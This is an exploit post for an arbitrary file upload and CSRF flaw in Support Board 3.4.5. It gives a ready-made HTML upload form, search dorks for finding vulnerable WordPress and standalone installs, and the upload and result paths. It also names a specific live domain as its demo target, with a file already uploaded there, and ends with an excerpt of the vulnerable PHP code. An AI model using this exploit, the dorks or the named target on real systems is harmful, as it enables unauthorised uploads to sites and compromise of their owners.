Exploit Title: Support Board 3.4.5 Arbitrary File Upload / CSRF File Upload
Author: L4663r666h05t
Twitter: https://twitter.com/L4663r666h05t
Vendor Homepage: N/A
Postfile: file
CSRF Code:
<form action="https://www.support.angohost.ao/supportboard/include/upload.php" method="post" target="_blank">
<input type="file" name="file">
<input type="submit" name="kill" value=">>">
</form>
On Non-WP:
/supportboard/include/upload.php
Dork For Non-WP:
supportboard/uploads/
On WP:
/wp-content/plugins/supportboard/supportboard/include/upload.php
Dork for WP:
/wp-content/plugins/supportboard/supportboard/uploads/
Path file:
/supportboard/uploads/(tanggal)/randomname_namafile.jpg
/~path/uploads/(tanggal)/randomname_namafile.jpg
If vulnerable, upload.php will show this:
["error","Support Board Error: Key file in $_FILES not found."]
Demo:
https://www.support.angohost.ao/supportboard/include/upload.php
Result:
https://www.support.angohost.ao/supportboard/uploads/01-03-22/69927_0x.jpg
Success upload will show text like:
["success","SB_URL\/uploads\/(timestamp)\/(random)_(your file name).jpg"]
vuln code on upload.php:
$allowed_extensions = array('json','psd','ai','jpg','jpeg','png','gif','pdf','doc','docx','key','ppt','odt','xls','xlsx','zip','rar','mp3','m4a','ogg','wav','mp4','mov','wmv','avi','mpg','ogv','3gp','3g2','mkv','txt','ico','csv','ttf','font','css','scss');
if (isset($_FILES['file'])) {
if (0 < $_FILES['file']['error']) {
die(json_encode(array('error', 'Support Board: Error into upload.php file.')));
} else {
$file_name = sb_upload_escape($_FILES['file']['name']);
$infos = pathinfo($file_name);
$directory_date = date('d-m-y');
$path = '../uploads/' . $directory_date;
$url = SB_URL . '/uploads/' . $directory_date;
if (isset($infos['extension']) && in_array(strtolower($infos['extension']), $allowed_extensions)) {
if (defined('SB_UPLOAD_PATH') && SB_UPLOAD_PATH != '' && defined('SB_UPLOAD_URL') && SB_UPLOAD_URL != '') {
$path = SB_UPLOAD_PATH . '/' . $directory_date;
$url = SB_UPLOAD_URL . '/' . $directory_date;
}